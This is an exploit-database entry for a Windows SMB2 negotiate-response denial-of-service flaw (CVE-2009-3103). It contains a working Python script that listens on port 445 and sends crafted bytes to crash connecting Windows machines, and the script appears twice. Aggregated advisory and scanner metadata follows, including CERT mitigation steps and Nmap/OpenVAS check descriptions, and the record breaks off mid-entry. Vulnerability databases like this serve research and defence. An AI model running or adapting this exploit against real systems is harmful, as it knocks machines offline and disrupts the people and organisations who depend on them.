ID EDB-ID:12524 Type exploitdb Reporter Jelmer de Hen Modified 2010-05-07T00:00:00
Description
Windows SMB2 Negotiate Protocol (0x72) Response DOS. CVE-2009-3103. Dos exploit for windows platform
#!/usr/bin/python
# === EDIT â this exploit appears to be exactly the same one of one which was already found
# and fixed notified by Laurent GaffiĂŠ, i did not know this but his blog post can be found here:
# http://g-laurent.blogspot.com/2009/11/windows-7-server-2008r2-remote-kernel.html
import socket,sys,time
print "Maliformed negotiate protocol response and quickly closing the connection causes Windows machines supporting SMB2 to crash (leaves the system hanging and unresponsive) -- tested on Win 7 build 2600"
print "Written by Jelmer de Hen"
print "Published at http://h.ackack.net/?p=387"
smb = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
smb.bind(("", 445))
smb.listen(1)
smbconn, addr = smb.accept()
print "[+] "+str(addr)+" is trying to make connection to us over port 445"
while 1:
new_packet = smbconn.recv(1024)
print "[+] Waiting for a negotiate request packet"
if new_packet[8]=="r":
print "[+] Received the negotiate request packet injecting the 4 bytes now..."
smbconn.send("\x00\x00\x00\x01")
break
print "[+] Closing connection... This is part of the exploit"
smbconn.close()
print "[+] Done, if all went good then the box on the other side crashed"
{"cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "references": [], "href": "https://www.exploit-db.com/exploits/12524/", "objectVersion": "1.0", "sourceHref": "https://www.exploit-db.com/download/12524/", "sourceData": "#!/usr/bin/python\r\n\r\n# === EDIT \u00e2\u0080\u0093 this exploit appears to be exactly the same one of one which was already found\r\n# and fixed notified by Laurent Gaffi\u0102\u0160, i did not know this but his blog post can be found here:\r\n# http://g-laurent.blogspot.com/2009/11/windows-7-server-2008r2-remote-kernel.html\r\n\r\nimport socket,sys,time\r\n\r\nprint \"Maliformed negotiate protocol response and quickly closing the connection causes Windows machines supporting SMB2 to crash (leaves the system hanging and unresponsive) -- tested on Win 7 build 2600\"\r\nprint \"Written by Jelmer de Hen\"\r\nprint \"Published at http://h.ackack.net/?p=387\"\r\nsmb = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\nsmb.bind((\"\", 445))\r\nsmb.listen(1)\r\nsmbconn, addr = smb.accept()\r\nprint \"[+] \"+str(addr)+\" is trying to make connection to us over port 445\"\r\nwhile 1:\r\n\tnew_packet = smbconn.recv(1024)\r\n\tprint \"[+] Waiting for a negotiate request packet\"\r\n\tif new_packet[8]==\"r\":\r\n\t\tprint \"[+] Received the negotiate request packet injecting the 4 bytes now...\"\r\n\t\tsmbconn.send(\"\\x00\\x00\\x00\\x01\")\r\n\t\tbreak\r\nprint \"[+] Closing connection... This is part of the exploit\"\r\nsmbconn.close()\r\nprint \"[+] Done, if all went good then the box on the other side crashed\"\r\n\r\n\r\n", "osvdbidlist": ["57799"], "title": "Windows SMB2 Negotiate Protocol 0x72 Response DoS", "bulletinFamily": "exploit", "modified": "2010-05-07T00:00:00", "hash": "eb2356dce20c4ddc4a501b38a6ee788705b689716b16fd2d29f7f67b79923faa", "description": "Windows SMB2 Negotiate Protocol (0x72) Response DOS. CVE-2009-3103. Dos exploit for windows platform", "lastseen": "2016-02-01T16:42:10", "edition": 1, "cvelist": ["CVE-2009-3103"], "published": "2010-05-07T00:00:00", "viewCount": 24, "type": "exploitdb", "reporter": "Jelmer de Hen", "history": [], "id": "EDB-ID:12524", "enchantments": {"vulnersScore": 4.0}}
{"result": {"cve": [{"id": "CVE-2009-3103", "type": "cve", "title": "CVE-2009-3103", "description": "Array index error in the SMBv2 protocol implementation in srv2.sys in Microsoft Windows Vista Gold, SP1, and SP2, Windows Server 2008 Gold and SP2, and Windows 7 RC allows remote attackers to execute arbitrary code or cause a denial of service (system crash) via an & (ampersand) character in a Process ID High header field in a NEGOTIATE PROTOCOL REQUEST packet, which triggers an attempted dereference of an out-of-bounds memory location, aka \"SMBv2 Negotiation Vulnerability.\" NOTE: some of these details are obtained from third party information.", "published": "2009-09-08T18:30:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-3103", "cvelist": ["CVE-2009-3103"], "lastseen": "2017-09-19T13:36:37"}], "cert": [{"id": "VU:135940", "type": "cert", "title": "Windows SMB version 2 vulnerability", "description": "### Overview\n\nMicrosoft Windows Vista and Server 2008 do not correctly parse SMB version 2 messages.This vulnerability could allow an attacker to execute arbitrary code.\n\n### Description\n\nThe Server Message Block version 2 (SMBv2) protocol is the successor to the original SMB protocol. SMBv2 is available in Windows Vista, Server 2008 and Windows 7 release candidates. \n\nWindows Vista and Server 2008 fail to properly process fails to properly parse the headers for the Negotiate Protocol Request portion of an SMBv2 message. \n \n--- \n \n### Impact\n\nAn attacker may be able to execute arbitrary code or cause a vulnerable system to crash. \n \n--- \n \n### Solution\n\nThere is currently no solution to this problem. Until patches are available, users and administrators are encouraged to review the below workarounds. \n \n--- \n \n \n**Restrict access** \n \nBlocking access to ports `139/tcp` and `445/tcp` on vulnerable systems will mitigate this vulnerability. Administrators can configure mobile systems that use the Windows Firewall to open these ports only when the user is authenticated to a domain controller by using the firewall's \"[profile](<http://technet.microsoft.com/en-us/library/dd734783\\(WS.10\\).aspx>)\" feature. \n \n**Disable SMBv2** \n \nDisabling SMBv2 will mitigate this issue. The below steps to disable SMBv2 are provided in Microsoft Security Advisory [975497](<http://www.microsoft.com/technet/security/advisory/975497.mspx>). \n\n 1. Click Start, click Run, type Regedit in the Open box, and then click OK. \n 2. Locate and then click the following registry subkey: \n 3. HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Services \n 4. Click LanmanServer. \n 5. Click Parameters. \n 6. Right-click to add a new DWORD (32 bit) Value. \n 7. Enter smb2 in the Name data field, and change the Value data field to 0. \n 8. Exit. \n 9. From a command prompt and with administrator privileges, type `net stop server` and then `net start server`. \n \n--- \n \n### Systems Affected \n\nVendor| Status| Date Notified| Date Updated \n---|---|---|--- \nMicrosoft Corporation| | -| 10 Sep 2009 \nIf you are a vendor and your product is affected, [let us know](<mailto:cert@cert.org?Subject=VU%23135940 Vendor Status Inquiry>).\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | N/A | N/A \nTemporal | N/A | N/A \nEnvironmental | N/A | N/A \n \n### References\n\n * <http://www.microsoft.com/technet/security/advisory/975497.mspx>\n * <http://technet.microsoft.com/en-us/library/dd734783(WS.10).aspx>\n * <http://g-laurent.blogspot.com/2009/09/windows-vista7-smb20-negotiate-protocol.html>\n\n### Credit\n\nThanks to Microsoft and Laurent Gaffi\u00e9 for information that was used in this report.\n\nThis document was written by Ryan Giobbi.\n\n### Other Information\n\n * CVE IDs: [CVE-2009-3103](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-3103>)\n * Date Public: 07 Sep 2009\n * Date First Published: 10 Sep 2009\n * Date Last Updated: 16 Sep 2009\n * Severity Metric: 62.70\n * Document Revision: 16\n\n", "published": "2009-09-10T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.kb.cert.org/vuls/id/135940", "cvelist": ["CVE-2009-3103", "CVE-2009-3103"], "lastseen": "2016-02-03T09:12:05"}], "canvas": [{"id": "SMB2_NEGOTIATE_REMOTE", "type": "canvas", "title": "Immunity Canvas: SMB2_NEGOTIATE_REMOTE", "description": "**Name**| smb2_negotiate_remote \n---|--- \n**CVE**| CVE-2009-3103 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| SMB2 Negotiate Pointer Dereference Vulnerability \n**Notes**| CVE Name: CVE-2009-3103 \nVENDOR: Microsoft \nMSADV: MS09-050 \nVersionsAffected: \nRepeatability: One shot \nReferences: http://blog.48bits.com/?p=510, http://www.microsoft.com/technet/security/Bulletin/MS09-050.mspx \nCVE Url: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103 \nDate public: 09/07/09 \nCVSS: 7.8 \n\n", "published": "2009-09-08T18:30:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/smb2_negotiate_remote", "cvelist": ["CVE-2009-3103"], "lastseen": "2016-09-25T14:13:49"}], "openvas": [{"id": "OPENVAS:1361412562310104116", "type": "openvas", "title": "Nmap NSE net: smb-check-vulns", "description": "Checks for vulnerabilities: * MS08-067, a Windows RPC vulnerability * Conficker, an infection by\nthe Conficker worm * Unnamed regsvc DoS, a denial-of-service vulnerability I accidentally found in\nWindows 2000 * SMBv2 exploit (CVE-2009-3103, Microsoft Security Advisory 975497) * MS06-025, a\nWindows Ras RPC service vulnerability * MS07-029, a Windows Dns Server RPC service vulnerability\n\nSYNTAX:\n\nsmbport: Override the default port choice. If 'smbport' is open, it's used. It's assumed\nto be the same protocol as port 445, not port 139. Since it probably isn't possible to change\nWindows' ports normally, this is mostly useful if you're bouncing through a relay or something. \n\nrandomseed: Set to a value to change the filenames/service names that are randomly generated. \n\nsmbbasic: Forces the authentication to use basic security, as opposed to 'extended security'. \nAgainst most modern systems, extended security should work, but there may be cases\nwhere you want to force basic. There's a chance that you'll get better results for \nenumerating users if you turn on basic authentication. \n\nsmbsign: Controls whether or not server signatures are checked in SMB packets. By default, on Windows,\nserver signatures aren't enabled or required. By default, this library will always sign \npackets if it knows how, and will check signatures if the server says to. Possible values are:\n\n- 'force': Always check server signatures, even if server says it doesn't support them (will \nprobably fail, but is technically more secure). \n- 'negotiate': [default] Use signatures if server supports them. \n- 'ignore': Never check server signatures. Not recommended. \n- 'disable': Don't send signatures, at all, and don't check the server's. not recommended. \nMore information on signatures can be found in 'smbauth.lua'.\n\nsafe: If set, this script will only run checks that are known (or at\nleast suspected) to be safe. \n\nunsafe: If set, this script will run checks that, if the system isn't\npatched, are basically guaranteed to crash something. Remember that\nnon-unsafe checks aren't necessarily safe either)", "published": "2011-06-01T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310104116", "cvelist": ["CVE-2009-3103"], "lastseen": "2017-12-14T11:56:15"}, {"id": "OPENVAS:1361412562310801287", "type": "openvas", "title": "Nmap NSE: SMB Check Vulnerabilities", "description": "This script attempts to check the following vulnerabilities:\n - MS08-067, a Windows RPC vulnerability\n - Conficker, an infection by the Conficker worm\n - Unnamed regsvc DoS\n - SMBv2 exploit (CVE-2009-3103)\n\n This is a wrapper on the Nmap Security Scanner's (http://nmap.org) smb-check-vulns.nse.", "published": "2010-09-23T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310801287", "cvelist": ["CVE-2009-3103"], "lastseen": "2018-04-09T11:42:04"}, {"id": "OPENVAS:1361412562310803571", "type": "openvas", "title": "Nmap NSE 6.01: smb-check-vulns", "description": "Checks for vulnerabilities: * MS08-067, a Windows RPC vulnerability * Conficker, an infection by\nthe Conficker worm * Unnamed regsvc DoS, a denial-of-service vulnerability I accidentally found in\nWindows 2000 * SMBv2 exploit (CVE-2009-3103, Microsoft Security Advisory 975497) * MS06-025, a\nWindows Ras RPC service vulnerability * MS07-029, a Windows Dns Server RPC service vulnerability\n\nWARNING: These checks are dangerous, and are very likely to bring down a server. These should not\nbe run in a production environment unless you (and, more importantly, the business) understand the\nrisks!\n\nAs a system administrator, performing these kinds of checks is crucial, because a lot more damage\ncan be done by a worm or a hacker using this vulnerability than by a scanner. Penetration testers,\non the other hand, might not want to use this script -- crashing services is not generally a good\nway of sneaking through a network.\n\nIf you set the script parameter 'unsafe', then scripts will run that are almost (or\ntotally) guaranteed to crash a vulnerable system; do NOT specify 'unsafe' in a production\nenvironment! And that isn't to say that non-unsafe scripts will not crash a system, they're just\nless likely to.\n\nIf you set the script parameter 'safe', then script will run that rarely or never crash a\nvulnerable system. No promises, though.\n\nMS08-067. Checks if a host is vulnerable to MS08-067, a Windows RPC vulnerability that can allow\nremote code execution. Checking for MS08-067 is very dangerous, as the check is likely to crash\nsystems. On a fairly wide scan conducted by Brandon Enright, we determined that on average, a\nvulnerable system is more likely to crash than to survive the check. Out of 82 vulnerable systems,\n\n\n\nSYNTAX:\n\nsmbport: Override the default port choice. If 'smbport' is open, it's used. It's assumed\nto be the same protocol as port 445, not port 139. Since it probably isn't possible to change\nWindows' ports normally, this is mostly useful if you're bouncing through a relay or something. \n\n\nrandomseed: Set to a value to change the filenames/service names that are randomly generated. \n\n\n\nsmbbasic: Forces the authentication to use basic security, as opposed to 'extended security'. \nAgainst most modern systems, extended security should work, but there may be cases\nwhere you want to force basic. There's a chance that you'll get better results for \nenumerating users if you turn on basic authentication. \n\n\nsmbsign: Controls whether or not server signatures are checked in SMB packets. By default, on Windows,\nserver signatures aren't enabled or required. By default, this library will always sign \npackets if it knows how, and will check signatures if the server says to. Possible values are:\n\n- 'force': Always check server signatures, even if server says it doesn't support them (will \nprobably fail, but is technically more secure). \n\n- 'negotiate': [default] Use signatures if server supports them. \n\n- 'ignore': Never check server signatures. Not recommended. \n\n- 'disable': Don't send signatures, at all, and don't check the server's. not recommended. \nMore information on signatures can be found in 'smbauth.lua'.\n\n\nsafe: If set, this script will only run checks that are known (or at\nleast suspected) to be safe. \n\n\n\nunsafe: If set, this script will run checks that, if the system isn't\npatched, are basically guaranteed to crash something. Remember that\nnon-unsafe checks aren't necessarily safe either)", "published": "2013-02-28T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310803571", "cvelist": ["CVE-2009-3103"], "lastseen": "2018-04-09T11:42:04"}, {"id": "OPENVAS:104116", "type": "openvas", "title": "Nmap NSE net: smb-check-vulns", "description": "Checks for vulnerabilities: * MS08-067, a Windows RPC vulnerability * Conficker, an infection by\nthe Conficker worm * Unnamed regsvc DoS, a denial-of-service vulnerability I accidentally found in\nWindows 2000 * SMBv2 exploit (CVE-2009-3103, Microsoft Security Advisory 975497) * MS06-025, a\nWindows Ras RPC service vulnerability * MS07-029, a Windows Dns Server RPC service vulnerability\n\nSYNTAX:\n\nsmbport: Override the default port choice. If 'smbport' is open, it's used. It's assumed\nto be the same protocol as port 445, not port 139. Since it probably isn't possible to change\nWindows' ports normally, this is mostly useful if you're bouncing through a relay or something. \n\nrandomseed: Set to a value to change the filenames/service names that are randomly generated. \n\nsmbbasic: Forces the authentication to use basic security, as opposed to 'extended security'. \nAgainst most modern systems, extended security should work, but there may be cases\nwhere you want to force basic. There's a chance that you'll get better results for \nenumerating users if you turn on basic authentication. \n\nsmbsign: Controls whether or not server signatures are checked in SMB packets. By default, on Windows,\nserver signatures aren't enabled or required. By default, this library will always sign \npackets if it knows how, and will check signatures if the server says to. Possible values are:\n\n- 'force': Always check server signatures, even if server says it doesn't support them (will \nprobably fail, but is technically more secure). \n- 'negotiate': [default] Use signatures if server supports them. \n- 'ignore': Never check server signatures. Not recommended. \n- 'disable': Don't send signatures, at all, and don't check the server's. not recommended. \nMore information on signatures can be found in 'smbauth.lua'.\n\nsafe: If set, this script will only run checks that are known (or at\nleast suspected) to be safe. \n\nunsafe: If set, this script will run checks that, if the system isn't\npatched, are basically guaranteed to crash something. Remember that\nnon-unsafe checks aren't necessarily safe either)", "published": "2011-06-01T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://plugins.openvas.org/nasl.php?oid=104116", "cvelist": ["CVE-2009-3103"], "lastseen": "2017-07-02T21:13:26"}, {"id": "OPENVAS:1361412562310100283", "type": "openvas", "title": "Microsoft Windows SMB2 '_Smb2ValidateProviderCallback()' Remote Code Execution Vulnerability", "description": "Microsoft Windows is prone to a remote code-execution vulnerability\nwhen processing the protocol headers for the Server Message Block\n(SMB) Negotiate Protocol Request.\n\nNOTE: Reportedly, for this issue to be exploitable, file sharing must\n be enabled.\n\nAn attacker can exploit this issue to execute code with SYSTEM-level\nprivileges; failed exploit attempts will likely cause denial-of-\nservice conditions.\n\nWindows 7 RC, Vista and 2008 Server are vulnerable; other versions may\nalso be affected.\n\nNOTE: Reportedly, Windows XP and 2000 are not affected.\n\nUPDATE (September 9, 2009): Symantec has confirmed the issue on\nWindows Vista SP1 and Windows Server 2008.", "published": "2009-10-01T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310100283", "cvelist": ["CVE-2009-3103"], "lastseen": "2018-04-06T11:40:37"}, {"id": "OPENVAS:100283", "type": "openvas", "title": "Microsoft Windows SMB2 '_Smb2ValidateProviderCallback()' Remote Code Execution Vulnerability", "description": "Microsoft Windows is prone to a remote code-execution vulnerability\nwhen processing the protocol headers for the Server Message Block\n(SMB) Negotiate Protocol Request.\n\nNOTE: Reportedly, for this issue to be exploitable, file sharing must\n be enabled.\n\nAn attacker can exploit this issue to execute code with SYSTEM-level\nprivileges; failed exploit attempts will likely cause denial-of-\nservice conditions.\n\nWindows 7 RC, Vista and 2008 Server are vulnerable; other versions may\nalso be affected.\n\nNOTE: Reportedly, Windows XP and 2000 are not affected.\n\nUPDATE (September 9, 2009): Symantec has confirmed the issue on\nWindows Vista SP1 and Windows Server 2008.", "published": "2009-10-01T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://plugins.openvas.org/nasl.php?oid=100283", "cvelist": ["CVE-2009-3103"], "lastseen": "2017-07-02T21:14:19"}, {"id": "OPENVAS:801287", "type": "openvas", "title": "Nmap NSE: SMB Check Vulnerabilities", "description": "This script attempts to check the following vulnerabilities:\n - MS08-067, a Windows RPC vulnerability\n - Conficker, an infection by the Conficker worm\n - Unnamed regsvc DoS\n - SMBv2 exploit (CVE-2009-3103)\n\n This is a wrapper on the Nmap Security Scanner's (http://nmap.org) smb-check-vulns.nse.", "published": "2010-09-23T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://plugins.openvas.org/nasl.php?oid=801287", "cvelist": ["CVE-2009-3103"], "lastseen": "2017-09-04T14:21:56"}, {"id": "OPENVAS:803571", "type": "openvas", "title": "Nmap NSE 6.01: smb-check-vulns", "description": "Checks for vulnerabilities: * MS08-067, a Windows RPC vulnerability * Conficker, an infection by\nthe Conficker worm * Unnamed regsvc DoS, a denial-of-service vulnerability I accidentally found in\nWindows 2000 * SMBv2 exploit (CVE-2009-3103, Microsoft Security Advisory 975497) * MS06-025, a\nWindows Ras RPC service vulnerability * MS07-029, a Windows Dns Server RPC service vulnerability\n\nWARNING: These checks are dangerous, and are very likely to bring down a server. These should not\nbe run in a production environment unless you (and, more importantly, the business) understand the\nrisks!\n\nAs a system administrator, performing these kinds of checks is crucial, because a lot more damage\ncan be done by a worm or a hacker using this vulnerability than by a scanner. Penetration testers,\non the other hand, might not want to use this script -- crashing services is not generally a good\nway of sneaking through a network.\n\nIf you set the script parameter 'unsafe', then scripts will run that are almost (or\ntotally) guaranteed to crash a vulnerable system; do NOT specify 'unsafe' in a production\nenvironment! And that isn't to say that non-unsafe scripts will not crash a system, they're just\nless likely to.\n\nIf you set the script parameter 'safe', then script will run that rarely or never crash a\nvulnerable system. No promises, though.\n\nMS08-067. Checks if a host is vulnerable to MS08-067, a Windows RPC vulnerability that can allow\nremote code execution. Checking for MS08-067 is very dangerous, as the check is likely to crash\nsystems. On a fairly wide scan conducted by Brandon Enright, we determined that on average, a\nvulnerable system is more likely to crash than to survive the check. Out of 82 vulnerable systems,\n\n\n\nSYNTAX:\n\nsmbport: Override the default port choice. If 'smbport' is open, it's used. It's assumed\nto be the same protocol as port 445, not port 139. Since it probably isn't possible to change\nWindows' ports normally, this is mostly useful if you're bouncing through a relay or something. \n\n\nrandomseed: Set to a value to change the filenames/service names that are randomly generated. \n\n\n\nsmbbasic: Forces the authentication to use basic security, as opposed to 'extended security'. \nAgainst most modern systems, extended security should work, but there may be cases\nwhere you want to force basic. There's a chance that you'll get better results for \nenumerating users if you turn on basic authentication. \n\n\nsmbsign: Controls whether or not server signatures are checked in SMB packets. By default, on Windows,\nserver signatures aren't enabled or required. By default, this library will always sign \npackets if it knows how, and will check signatures if the server says to. Possible values are:\n\n- 'force': Always check server signatures, even if server says it doesn't support them (will \nprobably fail, but is technically more secure). \n\n- 'negotiate': [default] Use signatures if server supports them. \n\n- 'ignore': Never check server signatures. Not recommended. \n\n- 'disable': Don't send signatures, at all, and don't check the server's. not recommended. \nMore information on signatures can be found in 'smbauth.lua'.\n\n\nsafe: If set, this script will only run checks that are known (or at\nleast suspected) to be safe. \n\n\n\nunsafe: If set, this script will run checks that, if the system isn't\npatched, are basically guaranteed to crash something. Remember that\nnon-unsafe checks aren't necessarily safe either)", "published": "2013-02-28T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://plugins.openvas.org/nasl.php?oid=803571", "cvelist": ["CVE-2009-3103"], "lastseen": "2017-09-04T14:21:56"}, {"id": "OPENVAS:1361412562310900965", "type": "openvas", "title": "Microsoft Windows SMB2 Negotiation Protocol Remote Code Execution Vulnerability", "description": "This host is missing a critical security update according to\n Microsoft Bulletin MS09-050.", "published": "2009-10-15T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310900965", "cvelist": ["CVE-2009-2532", "CVE-2009-2526", "CVE-2009-3103"], "lastseen": "2018-01-02T11:05:52"}], "saint": [{"id": "SAINT:30D79D30A079078FDE7DB3C5C56D3681", "type": "saint", "title": "Windows SMB2 buffer overflow", "description": "Added: 09/20/2010 \nCVE: [CVE-2009-3103](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103>) \nBID: [36299](<http://www.securityfocus.com/bid/36299>) \nOSVDB: [57799](<http://www.osvdb.org/57799>) \n\n\n### Background\n\nSMB2 is the replacement protocol for the SMB Windows filesharing protocol. \n\n### Problem\n\nA buffer overflow vulnerability in the SMB2 Service allows remote attackers to execute arbitrary commands. \n\n### Resolution\n\nApply the patch referenced in [Microsoft Security Bulletin 09-050](<http://www.microsoft.com/technet/security/bulletin/ms09-050.mspx>). \n\n### References\n\n<http://www.microsoft.com/technet/security/bulletin/ms09-050.mspx> \n\n\n### Limitations\n\nExploit works on Windows Vista SP1 and SP2. Exploitation attempts while other SMB2 activity is taking place may cause target system to reboot. \n\n### Platforms\n\nWindows Vista \n \n\n", "published": "2010-09-20T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/windows_smb2", "cvelist": ["CVE-2009-3103"], "lastseen": "2017-01-10T14:03:43"}, {"id": "SAINT:1E9A2A7C6228790D4846596C8DA04D49", "type": "saint", "title": "Windows SMB2 buffer overflow", "description": "Added: 09/20/2010 \nCVE: [CVE-2009-3103](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103>) \nBID: [36299](<http://www.securityfocus.com/bid/36299>) \nOSVDB: [57799](<http://www.osvdb.org/57799>) \n\n\n### Background\n\nSMB2 is the replacement protocol for the SMB Windows filesharing protocol. \n\n### Problem\n\nA buffer overflow vulnerability in the SMB2 Service allows remote attackers to execute arbitrary commands. \n\n### Resolution\n\nApply the patch referenced in [Microsoft Security Bulletin 09-050](<http://www.microsoft.com/technet/security/bulletin/ms09-050.mspx>). \n\n### References\n\n<http://www.microsoft.com/technet/security/bulletin/ms09-050.mspx> \n\n\n### Limitations\n\nExploit works on Windows Vista SP1 and SP2. Exploitation attempts while other SMB2 activity is taking place may cause target system to reboot. \n\n### Platforms\n\nWindows Vista \n \n\n", "published": "2010-09-20T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/windows_smb2", "cvelist": ["CVE-2009-3103"], "lastseen": "2016-10-03T15:01:57"}, {"id": "SAINT:214C8A991DD5F17EF7735584268D3CB3", "type": "saint", "title": "Windows SMB2 buffer overflow", "description": "Added: 09/20/2010 \nCVE: [CVE-2009-3103](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103>) \nBID: [36299](<http://www.securityfocus.com/bid/36299>) \nOSVDB: [57799](<http://www.osvdb.org/57799>) \n\n\n### Background\n\nSMB2 is the replacement protocol for the SMB Windows filesharing protocol. \n\n### Problem\n\nA buffer overflow vulnerability in the SMB2 Service allows remote attackers to execute arbitrary commands. \n\n### Resolution\n\nApply the patch referenced in [Microsoft Security Bulletin 09-050](<http://www.microsoft.com/technet/security/bulletin/ms09-050.mspx>). \n\n### References\n\n<http://www.microsoft.com/technet/security/bulletin/ms09-050.mspx> \n\n\n### Limitations\n\nExploit works on Windows Vista SP1 and SP2. Exploitation attempts while other SMB2 activity is taking place may cause target system to reboot. \n\n### Platforms\n\nWindows Vista \n \n\n", "published": "2010-09-20T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/windows_smb2", "cvelist": ["CVE-2009-3103"], "lastseen": "2016-12-14T16:58:06"}], "exploitdb": [{"id": "EDB-ID:9594", "type": "exploitdb", "title": "Windows Vista/7 SMB2.0 Negotiate Protocol Request Remote BSOD Vuln", "description": "Windows Vista/7 SMB2.0 Negotiate Protocol Request Remote BSOD Vuln. CVE-2009-3103. Dos exploit for windows platform", "published": "2009-09-09T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.exploit-db.com/exploits/9594/", "cvelist": ["CVE-2009-3103"], "lastseen": "2016-02-01T10:56:58"}, {"id": "EDB-ID:10005", "type": "exploitdb", "title": "Windows 7 / Server 2008R2 - Remote Kernel Crash", "description": "Windows 7 / Server 2008R2 Remote Kernel Crash. CVE-2009-3103. Dos exploit for windows platform", "published": "2009-11-11T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.exploit-db.com/exploits/10005/", "cvelist": ["CVE-2009-3103"], "lastseen": "2016-02-01T11:42:59"}, {"id": "EDB-ID:16363", "type": "exploitdb", "title": "Microsoft Windows SRV2.SYS SMB Negotiate ProcessID Function Table Dereference", "description": "Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference. CVE-2009-3103. Remote exploit for windows platform", "published": "2010-07-03T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.exploit-db.com/exploits/16363/", "cvelist": ["CVE-2009-3103"], "lastseen": "2016-02-01T23:42:04"}, {"id": "EDB-ID:14674", "type": "exploitdb", "title": "Microsoft Windows - SRV2.SYS SMB Negotiate ProcessID Function Table Dereference MS09-050", "description": "Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference (MS09-050). CVE-2009-2526,CVE-2009-2532,CVE-2009-3103. Remote exploit for windows platform", "published": "2010-08-17T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.exploit-db.com/exploits/14674/", "cvelist": ["CVE-2009-2532", "CVE-2009-2526", "CVE-2009-3103"], "lastseen": "2016-02-01T20:20:26"}], "packetstorm": [{"id": "PACKETSTORM:86712", "type": "packetstorm", "title": "Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference", "description": "", "published": "2010-02-26T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://packetstormsecurity.com/files/86712/Microsoft-SRV2.SYS-SMB-Negotiate-ProcessID-Function-Table-Dereference.html", "cvelist": ["CVE-2009-3103"], "lastseen": "2016-12-05T22:12:29"}, {"id": "PACKETSTORM:81723", "type": "packetstorm", "title": "Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference", "description": "", "published": "2009-09-29T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://packetstormsecurity.com/files/81723/Microsoft-SRV2.SYS-SMB-Negotiate-ProcessID-Function-Table-Dereference.html", "cvelist": ["CVE-2009-3103"], "lastseen": 